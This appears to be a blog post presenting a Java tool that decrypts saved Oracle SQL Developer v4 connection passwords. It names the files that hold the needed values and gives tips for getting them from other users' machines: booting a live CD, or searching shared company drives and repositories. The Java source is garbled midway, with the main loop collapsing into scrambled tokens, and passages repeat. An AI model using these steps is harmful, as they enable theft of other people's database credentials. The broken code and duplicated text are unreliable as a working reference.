ORACLE DB password decryptor

welcome back to war! saturday,06.55 am!
check it out:

In product-preferences.xml the other pieced of the needed information is found in the following tag:

With these two values and the following Java program, you're now able to decrypt the password:
java Decrypt_V4 F35q3vdbVrI= 3e8efb59-8a5a-4c13-b1d5-ff64f987787f

Oracle SQL Developer password decryptor

Oracle SQL Developer allows a user to associate passwords with connections so that the user doesn't have to enter the password each time he opens a connection.

Of course, these passwords need to be stored somewhere. SQL developer stores them in an encrypted form, but it is possible to decrypt them.

In case of SQL developer version 4, two files are needed to find the information to encrypt these passwords. On Windows, these are

• %APPDATA%\SQL Developer\system*\o.jdeveloper.db.connection*\connections.xml
• %APPDATA%\SQL Developer\system*\o.sqldeveloper*\product-preferences.xml

( %APPDATA% typically has a value of c:\user\username\AppData\Roaming)

In connections.xml, one piece of the needed information is found in the Contents tag:

   F35q3vdbVrI=

In product-preferences.xml the other pieced of the needed information is found in the following tag:

With these two values and the following Java program, you're now able to decrypt the password:

java Decrypt_V4 F35q3vdbVrI= 3e8efb59-8a5a-4c13-b1d5-ff64f987787f

Finding connections.xml and product-preferences.xml

As the two required files are found under %appdata%, they are typically unaccessible for other users.

However, there are at least two ways to access such files.

1. Using a Linux live CD

If you have physical access to the PC or laptop that has the connections.xml and product-preferences.xml and its harddisk is not encrypted, you can mount the PC harddisk with a Linux [live CD (such as Knoppix) and copy the necessary information

2. Using dir /s /b on the company drive

In many (big) companies, there is usually one or more »company drives« that all sorts of people and divisions or departments can store temporary files. Sometimes, database users backup theirconections.xml and product-preferences.xml on such drives.

Assuming this »company drive« is X:, then you can find these files in a cmd.exe window using

cd /d X:
dir /s /b connections.xml product-preferences.xml

You might also be lucky searching git or subversion repositories etc.

Source code (java)

// vi: ft=java

import java.security.MessageDigest;
import java.security.GeneralSecurityException;

import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

import javax.xml.bind.DatatypeConverter;

//     Requires Java 8:
import java.util.Base64;


public class Decrypt_V4 {

  private static byte[] des_cbc_decrypt(
       byte[] encrypted_password,
       byte[] decryption_key,
       byte[] iv)
  throws GeneralSecurityException
  {

    Cipher cipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
    cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(decryption_key, "DES"), new IvParameterSpec(iv));
    return cipher.doFinal(encrypted_password);

  }

  private static byte[] decrypt_v4(
      byte[] encrypted,
      byte[] db_system_id)
  throws GeneralSecurityException
  {

    byte[] encrypted_password = Base64.getDecoder().decode(encrypted);

    byte[] salt = DatatypeConverter.parseHexBinary("051399429372e8ad");

 // key = db_system_id + salt
    byte[] key = new byte[db_system_id.length + salt.length];
    System.arraycopy(db_system_id, 0, key, 0, db_system_id.length);
    System.arraycopy(salt, 0, key, db_system_id.length, salt.length);


    java.security.MessageDigest md = java.security.MessageDigest.getInstance("MD5");
    for (int i=0; i<42 -="" 0="" 8="" argv="" byte="" catch="" db_system_id="" des_cbc_decrypt="" e.tostring="" e="" encrypted="argv[0].getBytes();" encrypted_password="" i="" iv="" key.length="" key="" main="" password="" pre="" public="" return="" secret_key="" static="" string="" system.arraycopy="" system.out.println="" tring="" try="" void="" x="" xception="">

Github respository Oracle-SQL-developer-password-decryptor, path: /Decrypt_V4.java

Links

Ideas and knowhow were taken from https://gist.github.com/ajokela/1846191 and https://github.com/maaaaz/sqldeveloperpassworddecryptor

Source files on github